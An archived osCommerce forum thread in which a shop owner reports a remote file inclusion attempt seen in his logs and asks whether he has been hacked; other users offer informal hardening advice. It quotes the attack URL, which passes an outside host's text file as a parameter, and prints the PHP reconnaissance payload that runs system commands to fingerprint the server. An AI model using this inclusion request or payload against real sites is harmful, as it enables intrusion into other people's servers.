Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Potential Security Threat?


Benjjj6

Recommended Posts

Hi

 

Via the Who's Online page I caught someone running this script on my site today:

 

They went to: http://www.mysite.com//?p=http://pikappaal...mages/idd.txt???

 

I visited that exact address and it just redirected to my homepage, so I hope that means it hasnt affected my site at all. I have FWR Seurity Pro & URL Validator installed as well as Site Monitor.

 

If you view that page without mysite beforehand you can see the contents of the .txt file are:

 

<?php

function ConvertBytes($number) {

$len = strlen($number);

if($len < 4) {

return sprintf("%d b", $number); }

if($len >= 4 && $len <=6) {

return sprintf("%0.2f Kb", $number/1024); }

if($len >= 7 && $len <=9) {

return sprintf("%0.2f Mb", $number/1024/1024); }

return sprintf("%0.2f Gb", $number/1024/1024/1024); }

 

echo "Osirys<br>";

$un = @php_uname();

$id1 = system(id);

$pwd1 = @getcwd();

$free1= diskfreespace($pwd1);

$free = ConvertBytes(diskfreespace($pwd1));

if (!$free) {$free = 0;}

$all1= disk_total_space($pwd1);

$all = ConvertBytes(disk_total_space($pwd1));

if (!$all) {$all = 0;}

$used = ConvertBytes($all1-$free1);

$os = @PHP_OS;

 

echo "0sirys was here ..<br>";

echo "uname -a: $un<br>";

echo "os: $os<br>";

echo "id: $id1<br>";

echo "free: $free<br>";

echo "used: $used<br>";

echo "total: $all<br>";

exit;

 

Are there any other security contributions I should add? What passwords would this script have affected, what usernames/passwords should I now change?

 

Thanks

 

Ben

Link to comment
Share on other sites

Yes you have been hacked.

 

Try google on

 

"0sirys was here"

 

Delete the file, change admin user name and passwords. Make passwords more complex. Review permissions on your site. (The last is a shameless plug for one of my contributions)

 

I'll leave you to work out more things you need to do ....

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Hi Geoffrey,

 

Are you sure I have been hacked? I ask because you said to delete the file (i assume you mean idd.txt) However, can't find it on my server. Also, as I have a number of security contributions already installed is there no way to prevent against this sort of attack!?

 

Passwords were already complex and admin had been renamed.

 

I will try your contribution though, thankyou :)

Link to comment
Share on other sites

Did you try the google solution?

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

I did try and search for what you specified. I only got 3 results with the term in quotes though. Also without the quotes I didnt find much either.

 

Someone on webhosting talk said "mod_security rule should prevent them" but this doesn't mean much to me.

 

If this is a well know exploit, surely there should be a way of preventing it?

Link to comment
Share on other sites

I don't think you have been hacked, the fact that you clicked on the URL mentioned and saw nothing out of the ordinary implies you don't have the security hole required.

 

I see these in my own who's online page and I know my files are clean

Link to comment
Share on other sites

Hey Mark,

 

Thats what I had assumed. I thought, surely if the hack had been successful then when I visited that page it should show all the server information the script requested, but instead it just redirected to the homepage.

 

I hope I havent been hacked *fingers crossed*!

 

 

btw. I found out that the IP address the user was using was from Russia....

Link to comment
Share on other sites

There were some good tips in the third one.

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...